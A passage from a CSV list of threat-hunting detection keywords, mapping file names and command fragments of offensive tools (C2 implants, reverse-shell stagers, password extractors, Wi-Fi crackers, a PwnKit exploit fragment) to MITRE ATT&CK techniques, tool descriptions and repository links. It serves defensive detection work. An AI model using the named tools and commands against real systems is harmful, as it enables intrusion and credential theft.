TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*WheresMyImplant.git*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*WheresMyImplant.sln*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*while * do mv *GCONV_PATH=./value* done","offensive_tool_keyword","POC","Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/Ayrx/CVE-2021-4034 ","1","0","N/A","N/A","1","97","16","2022-01-27T11:57:05Z","2022-01-26T03:33:47Z" +"*Whirlpool-Orig-512.verified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Whirlpool-Tweak-512.verified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Whisker.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*whiskeysaml.py*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" +"*whiskeysamlandfriends*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" +"*whoami /priv | findstr /i /C:*SeImpersonatePrivilege*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*whoami /user*","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","0","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" +"*whoami*","greyware_tool_keyword","whoami","whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt.whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for lateral movement. privilege escalation. or targeted attacks within the compromised network.","T1003.001 - T1087 - T1057 ","TA0006 - TA0007","N/A","N/A","Information Gathering","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8147","2532","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z" +"*whoami.exe* /groups*","greyware_tool_keyword","whoami","whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt.whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for lateral movement. privilege escalation. or targeted attacks within the compromised network.","T1003.001 - T1087 - T1057 ","TA0006 - TA0007","N/A","N/A","Information Gathering","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8147","2532","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z" +"*whoami.nim*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*whoami.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*WhoamiGetTokenInfo*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*wifi/airpwn*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*wifi/dnspwn*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*wifi_dos_own.py*","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1842","1638","2023-08-12T21:49:36Z","2021-01-07T16:11:52Z" +"*wifi_dos3.py*","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1842","1638","2023-08-12T21:49:36Z","2021-01-07T16:11:52Z" +"*wifi_dump_linux*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*wifi_fake_auth.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*WiFi_Hacker.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" +"*wifi_pineapple_csrf*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*wifi_recon_handshakes*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*wifi-arsenal*","offensive_tool_keyword","wifi-arsenal","github repo with all the wireless exploitation tools available","N/A","N/A","N/A","N/A","Network Exploitation tools","https://github.com/0x90/wifi-arsenal","1","1","N/A","N/A","10","1692","401","2020-07-06T00:46:06Z","2015-03-22T18:38:03Z" +"*wifibroot.py*","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","N/A","9","866","180","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z" +"*wifi-bruteforcer*","offensive_tool_keyword","wifi-bruteforcer-fsecurify","Android application to brute force WiFi passwords without requiring a rooted device.","T1110 - T1555 - T1051 - T1081","TA0002 - TA0008 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/faizann24/wifi-bruteforcer-fsecurify","1","1","N/A","N/A","10","1097","328","2022-04-16T02:59:36Z","2017-01-02T17:54:33Z" +"*wifi-bruteforcer*","offensive_tool_keyword","wifi-bruteforcer-fsecurity","Wifi bruteforcer","T1110 - T1114 - T1601 - T1602 - T1603","TA0003 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/faizann24/wifi-bruteforcer-fsecurify","1","1","N/A","N/A","10","1097","328","2022-04-16T02:59:36Z","2017-01-02T17:54:33Z" +"*wifidump.cna*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","481","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" +"*wifijammer*","offensive_tool_keyword","wifijammer","wifijammer","T1497 - T1498 - T1531","TA0001 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/DanMcInerney/wifijammer","1","1","N/A","N/A","10","3751","797","2023-07-04T01:43:51Z","2014-01-26T07:54:39Z" +"*wifiphisher*","offensive_tool_keyword","wifiphisher","The Rogue Access Point Framework.","T1553.003 - T1562 - T1539","TA0002 - TA0007 - ","N/A","N/A","Frameworks","https://github.com/wifiphisher/wifiphisher","1","1","N/A","N/A","10","12111","2518","2023-09-26T19:58:05Z","2014-09-26T12:47:28Z" +"*WiFi-Pumpkin*","offensive_tool_keyword","WiFi-Pumpkin","Framework for Rogue Wi-Fi Access Point Attack.","T1562 - T1530 - T1552 - T1553 - T1561","TA0005 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/P0cL4bs/WiFi-Pumpkin","1","1","N/A","N/A","10","3059","750","2020-04-18T19:32:52Z","2015-06-27T00:56:21Z" +"*wifite --crack*","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","0","N/A","N/A","10","5335","1189","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z" +"*wifite --dict *.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*wifite -e *","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","0","N/A","N/A","10","5335","1189","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z" +"*wifite --kill*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*wifite --wep *","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","0","N/A","N/A","10","5335","1189","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z" +"*Wifite.py*","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","1","N/A","N/A","10","5335","1189","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z" +"*wifite2.git*","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","1","N/A","N/A","10","5335","1189","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z" +"*win_chrome_password_extractor.py*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" +"*win_fake_malware.*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*win_keylogger.py*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" +"*win_rev_http.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*win_rev_https.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*win_rev_tcp.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*win_wlan_passwd_and_wanip_extractor.py*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" +"*Win32.LaZagne*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*Win32.Trojan*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Win32/Goodkit*","signature_keyword","Antivirus Signature","antivirus signatures","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*Win32/IceId*","signature_keyword","Antivirus Signature","antivirus signatures","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*Win32/Mikatz*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","mimikatz signatures","10","10","N/A","N/A","N/A","N/A" +"*Win32/Trickbot*","signature_keyword","Antivirus Signature","antivirus signatures","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*Win32/UACBypass*","signature_keyword","Antivirus Signature","windows defender antivirus signature for UAC bypass","N/A","N/A","N/A","N/A","Defense Evasion","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*Win32:Trojan*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*win32_stage_boot_reverse_shell_revert.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*win32_stage_uploadexec.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*win32_stage_winexec.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Win32kLeaker.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Win64.Lazagne*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*Win64/IceId*","signature_keyword","Antivirus Signature","antivirus signatures","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*Win64/Mikatz*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","mimikatz signatures","10","10","N/A","N/A","N/A","N/A" +"*Win7Elevate.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Win7ElevateDll.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*WinBruteLogon* -v -u*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","0","N/A","N/A","10","1027","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" +"*WinBruteLogon.dpr*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1027","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" +"*WinBruteLogon.dproj*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential 